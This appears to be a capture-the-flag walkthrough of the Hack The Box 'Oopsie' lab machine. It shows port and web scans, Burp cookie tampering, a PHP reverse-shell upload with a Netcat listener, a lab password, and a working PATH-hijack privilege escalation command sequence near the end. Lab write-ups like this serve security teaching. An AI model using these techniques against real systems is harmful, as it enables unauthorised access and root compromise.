HTB Starting point – Oopsie

ruben@kali:~/htb/oopsie$ sudo nmap -T4 -p- -A 10.10.10.28

Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-21 16:51 CEST
Stats: 0:00:29 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
Nmap scan report for 10.10.10.28
Host is up (0.11s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
|   256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_  256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=4/21%OT=22%CT=1%CU=38739%PV=Y%DS=2%DC=T%G=Y%TM=5E9F08C
OS:D%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST1
OS:1NW7%O6=M54BST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M54BNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 587/tcp)
HOP RTT       ADDRESS
1   126.73 ms 10.10.16.1
2   44.96 ms  10.10.10.28
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 69.22 seconds

We have port 80 open with apache.

ruben@kali:~/htb/oopsie$ sudo nikto -h http://10.10.10.28

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.28
+ Target Hostname:    10.10.10.28
+ Target Port:        80
+ Start Time:         2020-04-21 17:12:51 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-10944: : CGI Directory found
+ OSVDB-10944: /cdn-cgi/login/: CGI Directory found
+ OSVDB-3233: /icons/README: Apache default file found.
+ 10298 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2020-04-21 17:32:58 (GMT2) (1207 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

According to this result, we have a login site: /cdn-cgi/login/

ruben@kali:~/htb/oopsie$ gobuster dir -u http://10.10.10.28 -w /usr/share/wordlists/dirb/common.txt -e

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.28
[+] Threads:        10
[+] Wordlist:      /usr/share/wordlists/dirb/common.txt
[+] Status codes:  200,204,301,302,307,401,403
[+] User Agent:    gobuster/3.0.1
[+] Expanded:      true
[+] Timeout:        10s
===============================================================
2020/04/29 00:01:26 Starting gobuster
===============================================================
http://10.10.10.28/.htaccess (Status: 403)
http://10.10.10.28/.hta (Status: 403)
http://10.10.10.28/.htpasswd (Status: 403)
http://10.10.10.28/css (Status: 301)
http://10.10.10.28/fonts (Status: 301)
http://10.10.10.28/images (Status: 301)
http://10.10.10.28/index.php (Status: 200)
http://10.10.10.28/js (Status: 301)
http://10.10.10.28/server-status (Status: 403)
http://10.10.10.28/themes (Status: 301)
http://10.10.10.28/uploads (Status: 301)
===============================================================
2020/04/29 00:01:47 Finished
===============================================================

There is an upload directory.

Access to: http://10.10.10.28/cdn-cgi/login

Test credentials from the last machine: admin/MEGACORP_4dm1n!!

The upload section is restricted to super admin.

From the accounts section using BurpSuite:

We have a cookie with the user-id.
The request is sent using GET method.

Let’s make an attack using Burp to try to guess with is the user id of the super admin.

Send this request to the Intruder:

Python for loop to obtain the number list to be used in the payload options.

for i in range(1,100):
    print(i)

Redirections must be enabled to process the new cookie values after the redirections.

We obtain different lenghts in the responses. 
In the longest response, we can see the user-id of the super admin.

Make a new request with the user-id modified and the url of the uploads section:

Upload section

Try to upload a reverse shell due we have available php: https://github.com/pentestmonkey/php-reverse-shell:

File is uploaded.

According to previous gobuster result, there is an uploads folder. 
The file should have been uploaded there.

Open a Netcat session on the port defined in the reverse shell and access to the file:

Upgrade your Netcat shell to to a full TTY:

Shell with www-data user.

Are there more users? 
Do we remember a db.php file from the previous results?


Switch to Robert’s account:

Robert belongs to bugtracker’s group

Let’s see what elements on the filesystem belong to this group:

bugtracker is a binary, and the setuid bit is set.

setuid: a flag that allows users to run an executable with the permissions of the executable’s owner or group respectively and to change behavior in directories

Run strings in bugtracker app:

We see “cat /root/reports” 

We can create a specific cat to include the current working directory.
Let’s add the current working directory to PATH, create the malicious binary, and make it executable:

export PATH=/tmp:$PATH
cd /tmp/
echo '/bin/sh' > cat
chmod +x cat

Now we are root and finally, we can obtain our flags.